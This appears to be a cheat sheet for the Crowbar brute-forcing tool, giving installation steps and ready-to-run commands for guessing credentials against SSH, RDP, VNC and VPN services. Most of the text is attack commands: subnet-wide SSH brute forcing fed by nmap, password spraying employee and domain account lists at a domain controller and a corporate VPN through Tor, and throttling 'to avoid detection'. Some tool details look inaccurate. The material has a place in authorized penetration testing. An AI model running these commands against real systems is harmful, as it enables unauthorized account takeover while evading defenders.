Crowbar
Crowbar is a lightweight brute forcing tool designed for testing SSH, RDP, VPN (OpenVPN, Cisco AnyConnect), and other remote access services with socks and proxy support.
Installation
Linux/Ubuntu
# Clone repository
git clone https://github.com/jakethebeard/crowbar.git
cd crowbar
# Install dependencies
pip3 install -r requirements.txt
# or
pip3 install paramiko pycurl
# Make executable
chmod +x crowbar.py
sudo ln -s $(pwd)/crowbar.py /usr/local/bin/crowbarmacOS
# Install via Homebrew
brew tap homebrew-cask && brew install crowbar
# Or from source
git clone https://github.com/jakethebeard/crowbar.git
pip3 install -r requirements.txtBasic Syntax
# General format
python3 crowbar.py -b <service> -s <target> -u <username> -C <password_file> [-n <threads>] [-t <timeout>]
# Service types available
python3 crowbar.py -hSupported Services
| Service | Flag | Description |
|---|---|---|
| SSH | ssh | SSH authentication |
| RDP | rdp | Remote Desktop Protocol |
| VNC | vnc | Virtual Network Computing |
| OpenVPN | openvpn | OpenVPN authentication |
| Cisco AnyConnect | openvpn | Cisco VPN client |
| Keyboard-Interactive | ssh | SSH with keyboard-interactive auth |
Command-Line Options
| Option | Description |
|---|---|
-b, --service <SERVICE> | Service type (ssh, rdp, vnc, openvpn) |
-s, --single-target <IP> | Target IP address |
-u, --username <USER> | Single username |
-U, --username-file <FILE> | Username list file |
-C, --password-file <FILE> | Password list file (required) |
-n, --threads <NUM> | Number of threads |
-t, --timeout <SEC> | Connection timeout |
-p, --port <PORT> | Custom port |
-k, --key-file <FILE> | SSH key for authentication |
-m, --mode <MODE> | Authentication mode |
--proxy <PROXY> | Proxy settings (SOCKS5, HTTP) |
| -x, —ignore | Ignore specific errors |
SSH Brute Force
Basic SSH Attack
# Simple SSH brute force
python3 crowbar.py -b ssh -s 192.168.1.100 -u admin -C passwords.txt
# With multiple threads
python3 crowbar.py -b ssh -s target.com -u root -C wordlist.txt -n 10
# Custom port
python3 crowbar.py -b ssh -s target.com -p 2222 -u admin -C pass.txtSSH Key-Based Authentication
# Test SSH key passphrase
python3 crowbar.py -b ssh -s target.com -u admin -k id_rsa -C wordlist.txt
# SSH key with custom port
python3 crowbar.py -b ssh -s 10.0.0.50 -p 22 -u ubuntu -k ~/.ssh/id_rsa -C passphrases.txtUsername Enumeration
# Multiple usernames and passwords
python3 crowbar.py -b ssh -s target.com -U users.txt -C passwords.txt -n 5
# Targeting specific user list
python3 crowbar.py -b ssh -s 192.168.1.0/24 -U admin_accounts.txt -C wordlist.txtRDP Brute Force
Remote Desktop Services
# Basic RDP credential testing
python3 crowbar.py -b rdp -s 192.168.1.100 -u administrator -C passwords.txt
# Multiple threads for speed
python3 crowbar.py -b rdp -s rdp.internal -u admin -C wordlist.txt -n 15 -t 30
# Multiple targets
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > rdp_hosts.txt
for host in $(cat rdp_hosts.txt); do
python3 crowbar.py -b rdp -s "$host" -u administrator -C passwords.txt -n 5
doneDomain-Based RDP
# Domain credentials
python3 crowbar.py -b rdp -s dc.corp.local -u DOMAIN\\administrator -C pass.txt
# Service account testing
python3 crowbar.py -b rdp -s app-server.internal -U service_accounts.txt -C passwords.txtVNC Brute Force
# VNC server testing
python3 crowbar.py -b vnc -s 192.168.1.100 -u '' -C passwords.txt
# VNC with custom port
python3 crowbar.py -b vnc -s target.com -p 5900 -C wordlist.txt -n 8
# VNC key file
python3 crowbar.py -b vnc -s 10.0.0.50 -k vnc_key -C passphrases.txtVPN Brute Force
OpenVPN Authentication
# OpenVPN credentials
python3 crowbar.py -b openvpn -s vpn.example.com -u admin -C passwords.txt
# Custom OpenVPN port
python3 crowbar.py -b openvpn -s vpn.internal -p 443 -u vpn_user -C wordlist.txt
# Multiple OpenVPN targets
python3 crowbar.py -b openvpn -s file:vpn_hosts.txt -u admin -C passwords.txtCisco AnyConnect
# Cisco AnyConnect SSL VPN
python3 crowbar.py -b openvpn -s vpn.cisco.com -u domain\\user -C pass.txt
# AnyConnect with timeout
python3 crowbar.py -b openvpn -s cisco-vpn.corp.local -u admin -C passwords.txt -t 15Advanced Techniques
Proxy Support
# SOCKS5 proxy
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt --proxy socks5://127.0.0.1:1080
# HTTP proxy for VPN
python3 crowbar.py -b openvpn -s vpn.example.com -u admin -C wordlist.txt --proxy http://proxy:8080
# Through SSH tunnel
# (Create tunnel first)
ssh -D 1080 bastion.com
python3 crowbar.py -b ssh -s internal.target -u user -C pass.txt --proxy socks5://127.0.0.1:1080Timeout and Rate Control
# Short timeout for quick failures
python3 crowbar.py -b ssh -s target.com -u admin -C wordlist.txt -t 5
# Slow brute force to avoid detection
python3 crowbar.py -b ssh -s target.com -u admin -C passwords.txt -n 2 -t 20
# Staged attack
# Test small wordlist first
python3 crowbar.py -b ssh -s target.com -u admin -C top-10.txt
# If successful, move to larger wordlist
python3 crowbar.py -b ssh -s target.com -u admin -C full-wordlist.txtCredential Testing Workflow
# 1. Create targeted wordlist
cat > credentials.txt << EOF
password123
admin
welcome
letmein
P@ssw0rd
EOF
# 2. Test SSH
python3 crowbar.py -b ssh -s 10.0.0.1 -u admin -C credentials.txt -n 5
# 3. Test RDP
python3 crowbar.py -b rdp -s 10.0.0.2 -u administrator -C credentials.txt -n 8
# 4. Test VPN
python3 crowbar.py -b openvpn -s vpn.internal -u user -C credentials.txt -n 3
# 5. Document findings
echo "SSH: $(python3 crowbar.py -b ssh -s 10.0.0.1 -u admin -C creds.txt)" >> findings.txtWordlist Management
Create Effective Wordlists
# Common SSH passwords
echo -e "password\nadmin123\nroot\nwelcome\n123456" > ssh_passwords.txt
# RDP defaults
echo -e "Password123!\nAdmin@123\nWelcome1" > rdp_defaults.txt
# VPN accounts
echo -e "vpn_user\nvpnadmin\nvpnaccount" > vpn_users.txt
# Combine wordlists
cat /usr/share/wordlists/rockyou.txt | head -100 > top-100.txt
# Download SecLists
git clone https://github.com/danielmiessler/SecLists.git
cp SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt common.txtReal-World Examples
Internal Network Assessment
# Find and test all SSH services
nmap -p 22 --open 192.168.0.0/24 -oG ssh_hosts.txt
grep "Host:" ssh_hosts.txt | awk '{print $2}' > ssh_targets.txt
# Brute force discovered SSH
for target in $(cat ssh_targets.txt); do
python3 crowbar.py -b ssh -s "$target" -U users.txt -C passwords.txt -n 5
doneMulti-Service Testing
# Test discovered RDP service
python3 crowbar.py -b rdp -s domain-controller.local \
-U domain_users.txt \
-C spraying_passwords.txt \
-n 10 \
-t 15
# Test OpenVPN access
python3 crowbar.py -b openvpn -s corporate-vpn.com \
-U employee_list.txt \
-C temporal_passwords.txt \
-n 5 \
--proxy socks5://127.0.0.1:9050Troubleshooting
Common Issues
Connection timeouts
# Increase timeout
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt -t 30
# Reduce threads (too many causes timeouts)
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt -n 3Module not found
# Install missing dependencies
pip3 install paramiko pycurl python-nmap
# Verify installation
python3 crowbar.py -hFirewall blocking
# Use proxy
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt --proxy socks5://proxy:1080
# Increase timeout to allow blocked packets
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt -t 45Best Practices
- Obtain explicit written authorization before testing
- Use appropriate thread counts (3-5 for stealth, 10-15 for lab)
- Implement rate limiting to avoid account lockouts
- Test with minimal wordlists first
- Monitor for IDS/IPS alerts
- Document all attempts and timestamps
- Use unique job identifiers for tracking
- Respect firewall rules and security controls
- Verify credentials before exploitation
- Remove test accounts after assessment
- Follow responsible disclosure procedures
Last updated: 2025-03-30 | Crowbar GitHub